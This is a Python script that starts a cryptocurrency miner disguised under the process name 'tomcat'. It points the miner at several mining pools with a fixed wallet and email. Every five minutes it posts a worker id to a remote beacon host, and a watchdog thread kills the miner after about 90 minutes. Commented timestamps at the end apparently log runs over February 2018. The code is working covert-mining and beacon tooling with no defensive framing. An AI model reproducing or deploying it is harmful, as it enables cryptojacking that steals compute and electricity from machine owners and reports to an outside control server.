import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:17:01.359889
#2018-02-17 17:04:04.808019
#2018-02-17 18:52:05.140408
#2018-02-17 20:40:07.266025
#2018-02-17 22:27:07.474178
#2018-02-18 00:10:06.252010
#2018-02-18 02:02:05.273185
#2018-02-18 03:48:06.284946
#2018-02-18 05:35:07.912981
#2018-02-18 07:28:04.878255
#2018-02-18 09:16:06.100149
#2018-02-18 11:02:03.238821
#2018-02-18 12:48:07.624844
#2018-02-18 14:36:04.397585
#2018-02-18 16:25:08.201533
#2018-02-18 18:15:02.915529
#2018-02-18 20:01:06.427014
#2018-02-18 21:48:01.519761
#2018-02-18 23:37:01.761609
#2018-02-19 01:23:01.840173
#2018-02-19 03:11:02.187633
#2018-02-19 04:56:02.108331
#2018-02-19 06:40:09.094346
#2018-02-19 08:30:07.287398
#2018-02-19 10:19:01.912958
#2018-02-19 12:07:01.694263
#2018-02-19 13:53:05.776940
#2018-02-19 15:42:08.007093
#2018-02-19 17:31:01.610293
#2018-02-19 19:18:05.873088
#2018-02-19 21:06:01.974215
#2018-02-19 22:53:06.650576
#2018-02-20 00:38:07.948807
#2018-02-20 02:28:07.821147
#2018-02-20 04:18:01.283448
#2018-02-20 06:02:05.630598
#2018-02-20 07:47:07.059132
#2018-02-20 09:33:04.372936
#2018-02-20 11:16:09.960224
#2018-02-20 13:04:01.810275
#2018-02-20 14:47:04.151914
#2018-02-20 16:33:09.733772
#2018-02-20 18:20:03.083092
#2018-02-20 20:11:08.888186
#2018-02-20 21:58:06.071082
#2018-02-20 23:38:06.478696
#2018-02-21 01:22:07.121434
#2018-02-21 03:11:05.298588
#2018-02-21 04:58:07.613981
#2018-02-21 06:46:01.935737
#2018-02-21 08:31:01.823715
#2018-02-21 10:16:03.996994
#2018-02-21 12:03:10.259950
#2018-02-21 13:51:09.855639
#2018-02-21 15:37:11.664119
#2018-02-21 17:28:04.141232
#2018-02-21 19:16:04.982534
#2018-02-21 21:03:05.756216
#2018-02-21 22:49:01.594867
#2018-02-22 00:33:03.605751
#2018-02-22 02:19:07.143040
#2018-02-22 04:06:07.797143
#2018-02-22 05:51:04.450716
#2018-02-22 07:36:05.704191
#2018-02-22 09:25:04.981368
#2018-02-22 11:11:01.246697
#2018-02-22 12:57:04.623328
#2018-02-22 14:44:01.277235
#2018-02-22 16:31:04.020917
#2018-02-22 18:17:04.708883
#2018-02-22 20:07:06.748437
#2018-02-22 21:54:06.062355
#2018-02-22 23:41:07.524145
#2018-02-23 01:28:04.833795
#2018-02-23 03:14:05.834694
#2018-02-23 05:02:04.689568
#2018-02-23 06:47:05.712182
#2018-02-23 08:38:02.014257
#2018-02-23 10:52:07.039107
#2018-02-23 12:49:07.857135
#2018-02-23 14:33:05.242384
#2018-02-23 16:22:06.345572
#2018-02-23 18:09:10.242578
#2018-02-23 19:55:09.741884
#2018-02-23 21:38:05.215725
#2018-02-23 23:27:07.506897
#2018-02-24 01:19:04.263272
#2018-02-24 03:09:03.914666
#2018-02-24 04:54:07.649982
#2018-02-24 06:39:06.128949
#2018-02-24 08:28:05.561211
#2018-02-24 10:14:07.214984
#2018-02-24 12:09:01.732270
#2018-02-24 13:56:06.865585
#2018-02-24 15:47:06.478524
#2018-02-24 17:41:06.062632
#2018-02-24 19:26:04.025032
#2018-02-24 21:16:06.976174
#2018-02-24 23:53:05.028097
#2018-02-25 03:10:08.647846
#2018-02-25 07:09:02.137412